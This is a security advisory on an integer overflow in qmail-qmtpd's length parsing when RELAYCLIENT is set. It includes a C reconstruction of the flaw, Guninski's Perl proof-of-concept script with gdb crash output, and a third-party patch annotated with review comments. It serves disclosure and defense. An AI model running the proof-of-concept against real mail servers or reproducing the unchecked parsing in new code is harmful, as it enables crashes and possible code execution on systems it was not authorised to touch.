QMail qmail-qmtpd RELAYCLIENT Environment Variable Integer Overflow Vulnerability
Affected systems:
Dan Bernstein QMail 2.0
Dan Bernstein QMail 1.03
Dan Bernstein QMail 1.02
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9797
QMail is a popular email server program.
qmail-qmtpd contains an integer overflow. An attacker can exploit it to cause a buffer overflow and execute arbitrary code on the system with the privileges of the qmail-qmtpd process.
If the RELAYCLIENT environment variable is between 4 and 1003 bytes long, an integer overflow in qmail-qmtpd.c causes a static buffer to overflow. The basic idea is that getlen() returns (unsigned long)-1 or -4; the check if (len + relayclientlen >= 1000) is then passed with len == (unsigned)-4, and this len is used for the copy into the static buffer. The bound check on len is performed before len is updated, so len can be updated with an out-of-range value and then returned, which allows a large amount of memory, including qq, to be overwritten. If the C compiler places ssin after buf, Georgi Guninski believes this could be used to execute arbitrary code.
However, this configuration is not the default installation, and it is only active when mail relaying has been enabled by setting the RELAYCLIENT environment variable, so the security threat level of this vulnerability is not high.
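The wraparound described above, reconstructed as an added example (my code, not Guninski's and not qmail's): parse_len() models the getlen() loop with the original bound check and, when digit_check is set, the digit test from the third-party patch; copy_allowed() is the size check from qmail-qmtpd.c. The function names and the constructed field ",:" are assumptions of this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Models getlen(): every byte up to ':' is treated as a decimal digit, so a
   byte below '0' makes (ch - '0') negative and len wraps to a huge unsigned
   value.  With digit_check set, the range test from the third-party patch is
   applied instead.  Returns true on ':' and stores the value in *out; returns
   false where the daemon would call resources(), or when the input ends early. */
static bool parse_len(const char *s, size_t n, bool digit_check,
                      unsigned long *out)
{
  unsigned long len = 0;
  for (size_t i = 0; i < n; i++) {
    char ch = s[i];
    if (ch == ':') { *out = len; return true; }
    /* original: bound check before the update, no digit test */
    if (!digit_check && len > 200000000) return false;
    len = 10 * len + (unsigned long)(ch - '0');
    /* patched: bound check after the update, plus the digit test */
    if (digit_check && (len > 200000000 || ch < '0' || ch > '9')) return false;
  }
  return false;  /* stream ended without a ':' terminator */
}

/* Convenience wrappers for a NUL-terminated field (hypothetical helpers). */
static bool accepted(const char *s, bool digit_check)
{ unsigned long v; return parse_len(s, strlen(s), digit_check, &v); }
static unsigned long value_of(const char *s, bool digit_check)
{ unsigned long v = 0; parse_len(s, strlen(s), digit_check, &v); return v; }

/* The size check from qmail-qmtpd.c: true when the copy is allowed.  With
   len == (unsigned long)-4 and a RELAYCLIENT of 4 to 1003 bytes the sum wraps
   to 0..999, so the check passes although len is enormous. */
static bool copy_allowed(unsigned long len, size_t relayclientlen)
{
  return !(len + relayclientlen >= 1000);
}

int main(void)
{
  unsigned long len = value_of(",:", false);  /* constructed: ',' is '0' - 4 */
  printf("unpatched: len=%lu copy_allowed=%d\n", len, copy_allowed(len, 4));
  printf("patched:   accepted=%d\n", accepted(",:", true));
  return 0;
}
```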
<*Source: Georgi Guninski (guninski@guninski.com)
Link: http://www.guninski.com/qmail-qmtpd.html
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!
Georgi Guninski (guninski@guninski.com) provided the following test method:
[joro@sivokote tmp]$ ./qma-qmtpd.pl
qmail-qmtpd buffer overflow. Copyright Georgi Guninski
Cannot be used in vulnerability databases and similar stuff
<in another terminal>
ps awx
2080 pts/9 S 0:00 /var/qmail/bin/qmail-qmtpd
gdb attach 2080
cont
<in first terminal hit enter>
Program received signal SIGSEGV, Segmentation fault.
0x0804b096 in alarm ()
--------------------------------------------------
-qma-qmtpd.pl----
#!/usr/bin/perl -w
#Copyright Georgi Guninski Cannot be used in vulnerability databases and
#similar stuff
use IO::Socket;
use IO::Poll;
# RELAYCLIENT of exactly 4 bytes: relayclientlen == 4
$ENV{"RELAYCLIENT"}="M\$UX";
open(SOCK,"|/var/qmail/bin/qmail-qmtpd");
my $req;
my $fromaddr="they\@m\$.weenies";
my $touser="postmaster";
print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be used in vulnerability databases and similar stuff\n";
$req = "1:\n,";
$req .= "1:V,";
$req .= "/:";
#biglen - this is how we code '-1'
$req .= ",:";
#len - this is how we code '-4'
print SOCK $req;
my $ch=getc();
$req = "v" x 100000;
print SOCK $req;
close SOCK;
-----------------
Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Georgi Guninski provides the following third-party patch:
-patch-----
--- ../qmail-1.03/qmail-qmtpd.c 1998-06-15 13:53:16.000000000 +0300
+++ qmail-qmtpd.c 2004-02-29 16:15:13.000000000 +0200
@@ -45,8 +45,8 @@
for (;;) {
substdio_get(&ssin,&ch,1);
if (ch == ':') return len;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
}
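Review bot: the new "ch < '0' || ch > '9'" test runs only after "len = 10 * len + (ch - '0')" has already folded the non-digit into len, so correctness rests entirely on resources() never returning; validating ch before the arithmetic (an "if (ch < '0' || ch > '9') resources();" ahead of the update) would make the intent explicit and keep len from ever holding a wrapped value. Moving the 200000000 bound after the update is a deliberate tightening (it now rejects any accumulated value above the cap rather than only the value before the last multiply) and deserves a one-line comment so it is not mistaken for an accident.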
@@ -193,8 +193,8 @@
substdio_get(&ssin,&ch,1);
--biglen;
if (ch == ':') break;
- if (len > 200000000) resources();
len = 10 * len + (ch - '0');
+ if (len > 200000000 || ch < '0' || ch > '9') resources();
}
if (len >= biglen) badproto();
if (len + relayclientlen >= 1000) {
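Review bot: the unchanged "if (len + relayclientlen >= 1000)" at the end of this hunk is the comparison that wrapped; with the digit test and the 200000000 cap len is now bounded so the addition cannot overflow, but that invariant is implicit and should be stated in a comment next to the check. The same ordering point as in getlen() applies here (test ch before folding it into len), and "if (len >= biglen) badproto();" only regains its meaning once biglen itself comes from the patched getlen().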
-----------
Vendor patch:
Dan Bernstein
-------------
The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version:
http://cr.yp.to/qmail.html